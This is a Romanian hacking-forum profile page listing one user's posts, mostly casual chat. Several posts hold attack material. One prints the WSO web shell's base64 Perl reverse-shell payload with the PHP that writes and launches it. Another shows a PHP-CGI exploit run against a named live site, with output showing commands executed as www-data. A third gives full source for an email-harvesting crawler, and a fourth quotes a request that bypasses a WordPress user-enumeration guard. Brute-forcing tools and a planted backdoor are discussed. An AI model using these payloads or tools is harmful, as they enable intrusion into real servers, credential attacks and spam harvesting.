Jump to content

Elohim

Active Members
  • Posts

    700
  • Joined

  • Last visited

  • Days Won

    8

Everything posted by Elohim

  1. https://rstforums.com/forum/81459-linux-3-4-local-root-config_x86_x32-y-cve-2014-0038-a.rst import eyes import brains import os os.system(eyes+brains=search_function())
  2. Schimba-i in LTC wallet de pe btc-e.com, apoi vindei, si dai withdraw la USD in PM. Nu te mai complica sa iti iei tepe pe forum.
  3. Pentru a dezbate mai bine problema, recomand Episoadele 7, 8 si 9 din South Park , Ultimul sezon. Nu le-a ajuns 1 episod sa dezbata disputa intre PS si xBox .
  4. @IMAGINARY , probabil si Guta a zis candva " Pe al 14 lea vrea tata sa il faca programator "
  5. Pentru cei care nu le mai mergea bine GET ( site/?author=1 ) cand incercau sa preia userul admin pentru folosinte ulterioare. Stop User Enumeration is a WordPress plugin that provides protection against an unauthenticated attacker gaining a list of all WordPress users. This information can aid an attacker in further attacks against the website including brute-force password guessing attacks. This can be performed using wp-scan. Homepage: http://wordpress.org/plugins/stop-user-enumeration/ Version: 1.2.4 (latest) According to the full disclosure methodology I have publicly disclosed this at the same time as notifying the vendor. Advisory ------------- An attacker can bypass the username enumeration protection by using POST requests. The protection currently only stops GET requests to enumerate users. By sending POST requests with the body of "author=1" and incrementing the number over successive requests, the entire set of WordPress users can be enumerated. The WordPress user information is disclosed in the HTML response body, unlike being disclosed in the redirect header, as with GET requests. 1. POST / HTTP/1.1 Host: www.wordpress.com Content-Type: application/x-www-form-urlencoded Content-Length: 8 author=1 WordPress Stop User Enumeration 1.2.4 Bypass ? Packet Storm
  6. Un copil cu prea mult timp liber care schimba un index nu se numeste interventie a unui stat strain. Se numeste doar prostie.
  7. In ritmul tau, si cu mentalitatea care o ai, te va astepta un viitor stralucit in mall, curatand raioanele
  8. Tot iadul o sa se dezlantuie, tiganii nu o sa mai fure, toate femeile or sa vrea sa fie cu mine, toti barbatii or sa vrea sa fie ca mine, Kim Kardashian nu o sa mai fie grasa, si toata lumea o sa o duca bine. Asa de mult simtiti nevoia sa fiti dominati ? Nu puteti traii fara speranta ca in viitor, o sa vina cineva sa va conduca?
  9. Update 20 Feb 2014 : - Mici modificari la regex. S-a rezolvat problema cu email-urile cu prima litera mare, cele cu mailto: si SendIM: . Inca astept imbunatatiri pentru regex.
  10. Elohim

    Paypal via BTC

    Nu o sa gasesti. Tranzactiile din paypal sunt reversibile, pe cand cele din Bitcoin NU. Asadar, nimeni sanatos la cap nu o sa faca un asemenea schimb.
  11. DUBrute nu este nicidecum o mizerie, este chiar eficient daca este folosit corespunzator. Persoanele respective care te vor apela sa te invete cum sa il folosesti, pe bani, probabil sunt la acelasi nivel ca al tau. Cel mai indicat este sa incerci sa iti dai seama unde si cum gresesti. Cum iti procuri ip-urile ? Ce userlist si password list folosesti ? Cate threaduri ? Ce banda ai pe pc-ul unde il rulezi?
  12. Ca sa functioneze, ii trebuie un fisier cu domenii, cu sau fara prefixul http:// la inceput. Usage: python emailscrapper.py Threads File Exemplu: python emalscrapper.py 50 domenii.txt Mailurile se salveaza in emails.txt UPDATE 1.3: - izolare completa la proceselor - renuntat la threading, acum functioneaza cu multiprocese total paralele - preluare rezultate mai corect - 2-3x mai rapid fata de precedenta versiune Versiune minima pentru functionare este Python 2.6 Pentru variante customizate, aveti jabberul meu in cod. """ RST eMail Crawler Version: 1.3 Author: Elohim Contact Jabber: viktor@rows.io """ import urllib2 import re import sys import cookielib from threading import Timer from multiprocessing import Process, Queue class GetResults(Process): def __init__(self, rezqueue): Process.__init__(self) self.rezqueue = rezqueue def run(self): while True: email = self.rezqueue.get() if email is None: return False with open("emails.txt","a") as EmailFile: EmailFile.write(email.rstrip()+"\n") print email class Crawler(Process): def __init__(self, queue, rezqueue): Process.__init__(self) self.queue = queue self.rezqueue = rezqueue def run(self): while True: site = self.queue.get() if site is None: return False self.crawl(site) def crawl(self,site): try: WatchIt = Timer(15.0, self.WatchDog) WatchIt.start() cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) opener.addheaders = [('Accept:','*'),("User-Agent", "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0")] opener.addheaders = [('Content-Type', 'text/html; charset=utf-8'),("Accept-Encoding", "")] resp = opener.open(site,timeout=10) WatchIt.cancel() self.getem(resp.read()) except Exception, e: #print e f = 1 def getem(self,resp): try: emails = re.findall(r"[A-Za-z0-9%&*+?^_`{|}~-]+(?:\.[A-Za-z0-9!#$%&*+?^_`{|}~-]+)*@(?:[A-Za-z0-9](?:[a-z0-9-]*[A-Za-z0-9])?\.)+(?:[A-Za-z]{2}|com|org|net|edu|gov|mil|biz|info|mobi|name|aer o|asia|jobs|museum)\b", str(resp)) CleanEmails = set(emails) for em in CleanEmails: self.rezqueue.put(em.lower()) except Exception, e: return False def WatchDog(self): return False if __name__ == "__main__": if len(sys.argv) < 3: print "Usage:",sys.argv[0],"Threads DomainFile.txt" print "\tExample: ",sys.argv[0],"30 domains.txt" sys.exit() queue = Queue(maxsize=30000) rezqueue = Queue() ThreadNumber = int(sys.argv[1]) ThreadList = [] for i in range(ThreadNumber): t = Crawler(queue,rezqueue) t.daemon = True t.start() ThreadList.append(t) GR = GetResults(rezqueue) GR.daemon = True GR.start() with open(sys.argv[2],"rU") as urls: for url in urls: try: if url.startswith('http://'): queue.put(url.rstrip()) else: url = 'http://'+url.rstrip() queue.put(url.rstrip()) except Exception, e: print e for i in range(ThreadNumber): queue.put(None) for Worker in ThreadList: Worker.join() print "All done!" rezqueue.put(None) GR.join()
  13. Use gadgets called eyes and thumbs https://rstforums.com/forum/67009-openssh-5-3-remote-root-0day-exploit-32-bit-x86-priv8-priv8-priv8.rst
  14. Nu vad cum ar putea sa faca asta. E ca si cum ar da internetul inapoi cu 10 ani. Idea este superba, dar nu o vad practica. Probabil spera sa faca dupa modelul chinez, The Great Firewall of China, dar date tot trebuie sa iasa afara din EU, si sa intre. Un semi-intranet numai pentru EU, ar da peste cap o gramada de lucruri. Pe langa asta, principalul colector public , ca sa zic asa, de informatii este Google, din cookie, search history, activitate, mail, etc , etc. Ce facem, blocam si Google ? Bun, trecem totul printr-un firewall, cine se asigura ca datele odata ajunse peste atlantic, nu vor fi interceptate ? Sau imi scapa mie ceva ?
  15. Toata lumea isi face griji de datele de pe HDD, care cu o parola complexa la un pgp sau True Crypt ar rezolva problema, dar nimeni nu se preocupa de ce date are ISP-ul despre activitatea desfasurata pe acel PC. Degeaba dai cu vopsea peste rugina, rugina tot ramane.
  16. Toata ziua am stat dupa unele mici /vechi exploituri, testand diferite lucruri din diferite unghiuri, si m-am lovit the problema back-connect-ului. Acele vechi vechi script-uri de sunt N variante in N limbaje. Bun, am ajuns la concluzia ca codul care shell-url WSO il foloseste se adapteaza cel mai bine, cu o rata de 28 din 35 rulari pe sisteme diferite. Bineinteles, le urc the hard way, upload / wget, cum ma descurc, insa uitandu-ma in sursa de la un shell WSO, si lucrand cu acel exploit de PHP RCE, am observat abordarea urmatoare: $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; Acolo este un cod perl, codat in b64, niciun dubiu acolo. Apoi avem asa: cf("/tmp/bc.pl",$back_connect_p); $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &"); sleep(1); echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>"; unlink("/tmp/bc.pl"); E clar ca unlink sterge fisierul, acel echo imi cauta in procese daca s-a rulat , respectiv sa imi afiseze pid-ul. Nu inteleg partea asta cf("/tmp/bc.pl",$back_connect_p); Nu ma sperie functia search, si nicidecum google, si dupa nenumarate cautari, nu am reusit sa gasesc nimic despre acea functie, absolut nimic. Poate cineva sa ma lamureasca in cateva cuvinte cum se produce "magia" ? Multumesc. L.E. Ma scuzati, ora e tarzie, si se pare ca nu mai vad bine. Era chiar deasupra definita
  17. Nu va mai plac filmuletele free, acum lumea vrea conturi de sex chat cu credite deja adaugate ))
  18. Nu este o solutie viabila, linia din .htaccess nu este la fel pe toate systemele, unele accepta Addhandler, altele Addtype, iar aplicatia php nu este descrisa mereu cu application/x-httpd-php , sunt chiar vreo 6 variatii. De asemenea, nu merge sa le pui pe toate la gramada acolo, in speranta ca una din ele va merge. Nu ma intelege gresit, e un pas inainte comparativ cu ce gasesc pe unele servere ( irc style ).
  19. Avem asa: Test 1: http://nullsecurity.net/tools/exploit/ap-unlock-v1337.py python aphp.py -c "uname -a;id" -h koperbent.sk --==[ ap-unlock-v1337.py by noptrix@nullsecurity.net ]==-- [+] s3nd1ng c0mm4ndz t0 h0st koperbent.sk HTTP/1.1 200 OK Date: Tue, 18 Feb 2014 11:26:37 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny16 Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html 56 Linux server1.wibic.sk 2.6.26-2-686 #1 SMP Sun Mar 4 22:19:19 UTC 2012 i686 GNU/Linux 7e uid=33(www-data) gid=33(www-data) groups=33(www-data),5003(ispapps),5004(ispconfig),5005(client0),5006(client2),5007(client1) Si apoi cu cel postat de tine: python checker.py http://koperbent.sk [*] Target is: http://koperbent.sk [*] Testing Path: /index.php [*] Testing Path: /cgi-bin/php [*] Testing Path: /cgi-bin/php5 [*] Testing Path: /cgi-bin/php-cgi [*] Testing Path: /cgi-bin/php.cgi [*] Testing Path: /cgi-bin/php4 [*] Testing Path: /phppath/php [*] Testing Path: /phppath/php5 [*] Testing Path: /local-bin/php [*] Testing Path: /local-bin/php5 In primul test se foloseste /cgi-bin/php , care este prezent si in al doilea test. Am vrut sa modific cel postat de tine, in ceva multithreaded, si asa am dat peste problema. Revin cu un update daca imi dau seama unde este problema.
  20. Ce cacat de concluze e asta? Asta ai inteles tu din articol ? Ca furtul s-a putut intampla datorita increderei ? V-au prostit legalele alea de tot. Nu mai degraba de un setup prost si o securitate slaba ?
  21. Netscape, mai bine explica-i omului ca il furi pentru ca e din Moldavia )) gmail probabil ( posibil sa ma insel ) in prostia lui, a vrut sa spuna ca a cumparat un VCC, dar posibil sa nu aiba habar ceea ce face, si din cauza asta a zis ca poate e furat. Cere-i sa iti dea mail de pe mail-urile respective, asteapta 48h Daca nu se intampla nimic, nu e nicio teapa la mijloc. Sau posibil sa fie talhar, with moldavians you never know.
  22. Daca nu ma insel, merge si w.cn
  23. Goverments don't need to hack, they just ask/demand access )) Insa, frumoasa reclama isi fac.
  24. https://7chan.org/pr/src/Python_for_Dummies_(2006).pdf
  25. Pentru ca acea comanda sa mearga, userul X trebuie sa fie logat. Exemplu simplu : Am intrat pe serverul lui aelius cu userul brutus, am pornit acel mic backdoor, am iesit. Vreau sa reintru, o sa pot doar daca brutus este deja logat.
×
×
  • Create New...